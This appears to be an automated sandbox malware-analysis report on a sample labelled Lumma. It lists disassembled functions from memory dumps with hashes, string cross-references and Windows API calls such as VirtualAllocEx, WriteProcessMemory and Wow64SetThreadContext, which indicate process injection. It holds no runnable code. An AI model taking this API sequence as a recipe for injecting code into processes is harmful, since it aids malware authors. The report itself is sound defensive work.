Instruction ID: b0e54c8c81b36119a5dc4d3965a83df6fedd47efa420a4a6dd4dd2386357a7c2
Opcode Fuzzy Hash: 28469254bdbc743a9b3c6a2f7332c1de93f3f02c047ded5e994ed801198ea295
Instruction Fuzzy Hash: A0F10B74A11119DFCB44EFA4D994AADB7B2FF88300F558159E546AB3A5CF31EC82CB80

Function 0724059B Relevance: 3.9, Strings: 3, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 072409FD
$, xrefs: 072405B7
", xrefs: 07240621

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: "$$$'
API String ID: 0-970263009
Opcode ID: 88361b8bbed5c60a3abf50af4b0c0f4a68be2beedccca022f7b9e8a95c1b033a
Instruction ID: 4be5f525c19d22c4d861bb65e451a0f7aac3c1fdaf3cefaa2ba19bf3a9f0ff05
Opcode Fuzzy Hash: 88361b8bbed5c60a3abf50af4b0c0f4a68be2beedccca022f7b9e8a95c1b033a
Instruction Fuzzy Hash: 0251CBB4A14218CFEB64CFA8D888BDDBBF1FB4A300F108195D519A7351C7789985CF55

Function 072405AB Relevance: 3.9, Strings: 3, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

', xrefs: 072409FD
$, xrefs: 072405B7
", xrefs: 07240621

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: "$$$'
API String ID: 0-970263009
Opcode ID: cf31143a5b083fbd11b20ee8d3ded9fc87c40f9576d06c3aa2761c5d6cc28f9e
Instruction ID: 2a573eff46fb0bc0fd064895feda07b044871fc0d12778521f0e55aa1c2ad628
Opcode Fuzzy Hash: cf31143a5b083fbd11b20ee8d3ded9fc87c40f9576d06c3aa2761c5d6cc28f9e
Instruction Fuzzy Hash: 8C51C974A14218CFEB64CFA8D888BDDBBF1FB4A300F108195E519AB351C7789985CF65

Function 07242E9D Relevance: 3.9, Strings: 3, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

FFi', xrefs: 07242EBC
d%q, xrefs: 07242F04
%wr, xrefs: 07242FAB

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: %wr$FFi'$d%q
API String ID: 0-457687663
Opcode ID: a23d7cb008b0ee7db36527257c4bfcb0daedeb7d147c066e53ed3edefd8675d3
Instruction ID: 3de28879114485c4ea56937173b842773138e139f2006473d5cbbb894658b8d4
Opcode Fuzzy Hash: a23d7cb008b0ee7db36527257c4bfcb0daedeb7d147c066e53ed3edefd8675d3
Instruction Fuzzy Hash: 4A5126B4A10159CFDB54DF69D944BA9B7F2BB48300F1085EAE50EEB344DB749D818F60

Function 07283988 Relevance: 3.0, Strings: 2, Instructions: 516
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 07283D03
$q, xrefs: 07283CF3

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 655c0e198e198e3e70096db2e7b9a59732bfa7914edf662bac079d42c4179d6f
Instruction ID: 692cdce9b6a43826c058c65d9f51c3ad84ee19e8d16d7a0c869d48d05d8871b3
Opcode Fuzzy Hash: 655c0e198e198e3e70096db2e7b9a59732bfa7914edf662bac079d42c4179d6f
Instruction Fuzzy Hash: 1722BCB1E1121ADFCB15EFA4D854AAEBBB1FF48700F148415E821A73D6DB399942CF90

Function 07282FA1 Relevance: 2.7, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 072830B6
Hq, xrefs: 07283145

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 65432f50c37b0f2e5834e9f03b16829dd4a3608f38350d75181be57beec921d4
Instruction ID: e162fd46d1b05d102f43cc9d7d7b89a777268f200721d6da208ef145a304240c
Opcode Fuzzy Hash: 65432f50c37b0f2e5834e9f03b16829dd4a3608f38350d75181be57beec921d4
Instruction Fuzzy Hash: 4051CBB0B102019FD718EB78D85462E77A6AFC9700B54846DD506DB3A1DF3AEC42CBA6

Function 07285560 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

(q, xrefs: 072856CB
(q, xrefs: 07285674

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: 5590ab9b7af8ea22d67428698d08753a82155c97cfcd897d85bfbadc0e3a137b
Instruction ID: 1c86bfa8834c3e2393d123ff4679f900ae33bb966fe00fe883410052f09359dc
Opcode Fuzzy Hash: 5590ab9b7af8ea22d67428698d08753a82155c97cfcd897d85bfbadc0e3a137b
Instruction Fuzzy Hash: 9051C2717102119FDB19AF65E854BAE7BA2EFC4300F148169E906CB3E1CB39DC528B95

Function 07280BB0 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

,q, xrefs: 07280C13
#, xrefs: 07280CF0

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: #$,q
API String ID: 0-4134582004
Opcode ID: c0ad57034bdc243dfe9c2c56224bf4e10c76b6d2048132137581419568972c07
Instruction ID: f45f19bc359e9def7730bfe7dbd224b87e3b4ce86ec3668ecc3e24bd0accd845
Opcode Fuzzy Hash: c0ad57034bdc243dfe9c2c56224bf4e10c76b6d2048132137581419568972c07
Instruction Fuzzy Hash: 3441AE75B012058FCB14DF69D450A9EBBF2EF85311B158169E901DF3A1CB31EC06CB91

Function 0728E950 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

Hq, xrefs: 0728E9DB
(q, xrefs: 0728E9AF

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 9fed3fbba0953082f590df67809306360aaa93ffced23014b456164becd1ea88
Instruction ID: f199a6eacd2457d3a1ee321303e97831bc7504e6a3bd9de40cf7d38ce06eae77
Opcode Fuzzy Hash: 9fed3fbba0953082f590df67809306360aaa93ffced23014b456164becd1ea88
Instruction Fuzzy Hash: 89215A70B083446FC706EBB9D810A9E7FA79FC620075580AAD509CF3A2DE249D0683E3

Function 073676BA Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

', xrefs: 0736738C
TJq, xrefs: 073676E9

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: '$TJq
API String ID: 0-508091068
Opcode ID: 30e809144779da892425290205f65fce1ec4ac4000a1e4b3778956c296406ea8
Instruction ID: eb0eb982a210380f63c240649890b24418bdde8d6712bca33fa5fa24752d1e2b
Opcode Fuzzy Hash: 30e809144779da892425290205f65fce1ec4ac4000a1e4b3778956c296406ea8
Instruction Fuzzy Hash: 671102B0909218CBDB50CFA8DA48BEDB7F6FB09308F604198D009B7295CB355E85CF55

Function 0728A000 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,q, xrefs: 0728A37B

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: ac52fa3f9649f7208a2a6f69e6c1d7b6eb5489e6358e3271d047dc5e347a2d2e
Instruction ID: e9b3709051c7907b174d7350d0dcba42daee1eb62eeaf1371db4f7e84c00ec50
Opcode Fuzzy Hash: ac52fa3f9649f7208a2a6f69e6c1d7b6eb5489e6358e3271d047dc5e347a2d2e
Instruction Fuzzy Hash: CF521AB5A102298FDB64DF68C941BDDBBF2BF88300F1581D9E509AB391DA319D81CF61

Function 0728455E Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

(_q, xrefs: 072847ED

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: 77b69d4acaece5865d8cd47b1bebb137b09d621bcfc43d40c760b9a9b4939ae7
Instruction ID: e78e9728932bc66ba8afab1ce4d685ccf5d7bd5d99e7536840da7c627988ccba
Opcode Fuzzy Hash: 77b69d4acaece5865d8cd47b1bebb137b09d621bcfc43d40c760b9a9b4939ae7
Instruction Fuzzy Hash: 42229EB5B102469FDB54EFA8D894A6DB7F2FF88300F148059E905AB391CB76EC41CB90

Function 064DF5C5 Relevance: 1.7, APIs: 1, Instructions: 207processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064DF7AA

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ac058d47afb9fd443734e298e6ee2a11b214c8d51e5b64b3a9b383bfd831bf34
Instruction ID: 814ba5ca96126ee89fcc3201f7bc14a3a213c9e14f855a5651b07ceaa87f421d
Opcode Fuzzy Hash: ac058d47afb9fd443734e298e6ee2a11b214c8d51e5b64b3a9b383bfd831bf34
Instruction Fuzzy Hash: 0E814771D006499FDBA1DFA9C8917EEBBF2BF48310F14852AE816A7354DB748885CF81

Function 064DF5D0 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064DF7AA

Memory Dump Source

Source File: 00000000.00000002.1575565489.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64d0000_lumma_phothockey.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b0f5d4898805168b009be9a2ef1b5ed882d99f6edc292483397faf7fe55fcc64
Instruction ID: aaa4e2719a65522a051d08e84adc4aeb2f9a6d11cc2869541ce1e4cc146b2c3e
Opcode Fuzzy Hash: b0f5d4898805168b009be9a2ef1b5ed882d99f6edc292483397faf7fe55fcc64
Instruction Fuzzy Hash: BF813571D006499FDBA1DFA9C8917EEBBF2BF48310F14812AE816A7354DB748885CF81

Function 0662D224 Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 0662D319

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 045968b4e0ce073d33d036761c127cd32fa47b48ecb4bc5077063518bc140701
Instruction ID: 5efc076ea73806f82900b2047f7cdb984535379238a222dcc0ce3eb21bf17b7b
Opcode Fuzzy Hash: 045968b4e0ce073d33d036761c127cd32fa47b48ecb4bc5077063518bc140701
Instruction Fuzzy Hash: B84146B1D1075A9FDB60DFA9C881BDEBBB1FF48310F148529E815A7290CB758841CF91

Function 0662D5EC Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0662D6DF

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 75f1d49c8583ee2dc451042a4cdce5699d9ac317dadcf6c5824562c795f98136
Instruction ID: 4bf1e1c4589d9070b5528452ad62b44605f1c660c1367f3c651b971bf3089966
Opcode Fuzzy Hash: 75f1d49c8583ee2dc451042a4cdce5699d9ac317dadcf6c5824562c795f98136
Instruction Fuzzy Hash: B54165B0C106599FDB20DFA9C881BDEBBF2FF48310F148129E819A7250DB799841CF91

Function 0662D5F8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 0662D6DF

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 864a12564305a75ab2db870d43ba7cdf06aeaabba6a3dce4f057133aeae0d26a
Instruction ID: b78fd6fc70c3d71fb09d70c4ffc887201bd3ad7b00891de1b29bc45db8575d35
Opcode Fuzzy Hash: 864a12564305a75ab2db870d43ba7cdf06aeaabba6a3dce4f057133aeae0d26a
Instruction Fuzzy Hash: 194155B0C106599FDB60DFAAC881BDEBBF1EF48310F148529E819A7250CB799841CF80

Function 0662D230 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 0662D319

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1e837549d618631d7d4b147bb4f8a0ed56a9b79a04bc69794f078b54bd8aa290
Instruction ID: cda4876a4b6f2b15d0f1773acd7eb9728c55df3ccd4d1d2d1fc341749072e59a
Opcode Fuzzy Hash: 1e837549d618631d7d4b147bb4f8a0ed56a9b79a04bc69794f078b54bd8aa290
Instruction Fuzzy Hash: 304133B1D1076A9FDB60DFA9C881BDEBBB1FF48310F148529E815A7290CB799841CF81

Function 06571DD9 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06571E4E

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cc119c8ba710d6df2014c15aec36273a9e0c2c0a98749f1206cd4f013b716c91
Instruction ID: 8a72ab2fb00c4dbc93d8e9b92a524104e770a046feb52f7e2534d79ec95eaa16
Opcode Fuzzy Hash: cc119c8ba710d6df2014c15aec36273a9e0c2c0a98749f1206cd4f013b716c91
Instruction Fuzzy Hash: 08416B74E0060ADFDF20DFAAE844AEEBBF5FB48310F148429E519A7250C7399940CFA5

Function 06572050 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 065720E8

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ababd1126e76245ce844a95a0d59688300a71e750a544e8e6708d721a99c3e3e
Instruction ID: 1b1dfcdd47dbf08d3587d6b2302fbb3ca376a3a9982be1c221774ab605499026
Opcode Fuzzy Hash: ababd1126e76245ce844a95a0d59688300a71e750a544e8e6708d721a99c3e3e
Instruction Fuzzy Hash: 9B213975D003099FDB20DFA9D841BDEBBF5FF48310F50842AE918A7250CB799941CBA5

Function 06571831 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 065718B6

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4cfb704fd5b40599f01138e36568c892255ec514e5634ec598466f4ad8b36a03
Instruction ID: 41c0d2485aacaec6c247712803dbe6b62aac14297e8d884cbef3d5e13a103193
Opcode Fuzzy Hash: 4cfb704fd5b40599f01138e36568c892255ec514e5634ec598466f4ad8b36a03
Instruction Fuzzy Hash: 3B217A71C003099FDB20DFAAC885BEEBBF4EF48320F548429E418A7240CB789945CFA0

Function 06572058 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 065720E8

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4902b97a6958a711af32be13c54584f6d4bd2fc4a2955e32a3c0711ada6d6674
Instruction ID: ecc6e3eaf128ac797febc91a1509bca2fb8c683da8de495de240ef3d07e2fb4e
Opcode Fuzzy Hash: 4902b97a6958a711af32be13c54584f6d4bd2fc4a2955e32a3c0711ada6d6674
Instruction Fuzzy Hash: 8A212675D003499FDB10DFA9C881BDEBBF5FF48310F508429E918A7240CB799945CBA4

Function 02DB7EA4 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DB84D6,?,?,?,?,?), ref: 02DB8597

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e992542d72e497a8074572888c88574d8c1d58cfac054c95538663df61072f13
Instruction ID: d5bf33cda65b7ab1a7687d9f74389eac1601a1426f95aafa371ebfee59489d6a
Opcode Fuzzy Hash: e992542d72e497a8074572888c88574d8c1d58cfac054c95538663df61072f13
Instruction Fuzzy Hash: 8D21E5B5D00308DFDB10DF9AD984ADEBBF9EB48310F14841AE915A7350D379A954CFA4

Function 06571838 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 065718B6

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f68073929122fb79070bb51f84babfee8a3be9287a13c5d52b4313881c6205df
Instruction ID: 44ae489e9e6c953b6c4fbff48c6bc278218d4b7d5f5cf4145a7a8f4168a8498e
Opcode Fuzzy Hash: f68073929122fb79070bb51f84babfee8a3be9287a13c5d52b4313881c6205df
Instruction Fuzzy Hash: 86213571D003098FDB20DFAAC485BAEBBF4FF48320F54842AD819A7240CB789945CFA4

Function 02DB8509 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DB84D6,?,?,?,?,?), ref: 02DB8597

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ac70d69a942d92c5a200c00a14ac77ab3ba4852f1e4556405ff15f8f3ce433e7
Instruction ID: 693c41f1f51440cccacc2569d69742603b27bf4bd37075046f6e481755380449
Opcode Fuzzy Hash: ac70d69a942d92c5a200c00a14ac77ab3ba4852f1e4556405ff15f8f3ce433e7
Instruction Fuzzy Hash: A721E5B5D00249DFDB10CFA9D984ADEBBF5EF48320F14851AE954A3350C378A945DF64

Function 0662DCC0 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0662DD3C

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca6fd884b1ad41b3e244a445a2482e917320950738ee530eb2a65b4d9b469e7c
Instruction ID: 42e4ffc8d0b8e93970483bae37c00ef4d44fa50f05b8a8a58168d0c77447dbd5
Opcode Fuzzy Hash: ca6fd884b1ad41b3e244a445a2482e917320950738ee530eb2a65b4d9b469e7c
Instruction Fuzzy Hash: 21213771C007098FDB20DFAAC444BEEFBF5AF88320F548529D568A7290C7399945CFA0

Function 0662DCC8 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0662DD3C

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 48b610080a88d56aee9d1a81c771e4bdc1c9f8487fb56b83f2e2de30fc0a04cd
Instruction ID: 5bc47ca63aa46b66199eee60f2d59189eccefd7eb5e25e641d8564469a752cde
Opcode Fuzzy Hash: 48b610080a88d56aee9d1a81c771e4bdc1c9f8487fb56b83f2e2de30fc0a04cd
Instruction Fuzzy Hash: D0211571C007098FDB20DFAAC841BEEBBF5EF48320F548429D519A7250CB799945CFA0

Function 0662D928 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 0662D99E

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 9cd1f64760f41c68e8ce332854b1ba100b1e3cc033a6b6befdf9002043f5b8df
Instruction ID: cd141d00fef46402e82ec6a37dacaedc2d1d5e02ab0a325f6095273c727a1ae3
Opcode Fuzzy Hash: 9cd1f64760f41c68e8ce332854b1ba100b1e3cc033a6b6befdf9002043f5b8df
Instruction Fuzzy Hash: C1114776D003099FDB20DFAAC845BDEBBF5AF88324F148419E919A7250CB759940CFA5

Function 066297C9 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0662983F

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 42632b6307fca1a32533be55d810e6035d94980bd7502f01d8a29753147652a3
Instruction ID: 327df54cb8b749c01467b815aad200e5b37b1920be8ea512e220084578daf292
Opcode Fuzzy Hash: 42632b6307fca1a32533be55d810e6035d94980bd7502f01d8a29753147652a3
Instruction Fuzzy Hash: 5A111771D003598FDB20DFAAC4457AEFBF4AB88320F14841AD859A7250CB399945CFA4

Function 066297D0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0662983F

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b18f3b163ddaac0a612456ea7c59b0c208ef0bec0f3d7500d5f58bb33e11b264
Instruction ID: cf40cf219631d1ecf56b08ab2ee49d49e010027ca7148094068848b8dd8871ff
Opcode Fuzzy Hash: b18f3b163ddaac0a612456ea7c59b0c208ef0bec0f3d7500d5f58bb33e11b264
Instruction Fuzzy Hash: A3114C71D003598FDB20DFAAC4457EEFBF8AF88310F54841AD455A7240CB399944CFA4

Function 06571DE0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06571E4E

Memory Dump Source

Source File: 00000000.00000002.1575940301.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6570000_lumma_phothockey.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6c4f28c64260d196e867972657b9d5d52e127e2a8bab81df8420d4bd29b2f4f7
Instruction ID: 9c6a56467ea9a9acc536e8e7c8e16a52197483228a7c5c977396dfc70432d222
Opcode Fuzzy Hash: 6c4f28c64260d196e867972657b9d5d52e127e2a8bab81df8420d4bd29b2f4f7
Instruction Fuzzy Hash: 27112675C003499FDB20DFAAD845BDEBBF5EB48320F148419E919A7650CB799940CFA4

Function 0662D930 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 0662D99E

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 7e6a3ff781ff6877ea80f020ed85913cf8991a590677b8cbb55fede43754e6f2
Instruction ID: 9de8f13afca24716ca333bec713524b721ed4c193efa3735dba259ac4a1f6508
Opcode Fuzzy Hash: 7e6a3ff781ff6877ea80f020ed85913cf8991a590677b8cbb55fede43754e6f2
Instruction Fuzzy Hash: D7113775C003499FDB20DFAAC845BEEBBF5EF88324F148419E919A7250CB799950CFA1

Function 06620CFB Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 0662D99E

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b74f9cf1b039c633b5e8a078892a246f2e281093ab191817ada14f2352cf6ccb
Instruction ID: dc940683833508d7bd2e89ce8f3104511dd5ccb32d800c7c6f29b8b8d980c6fe
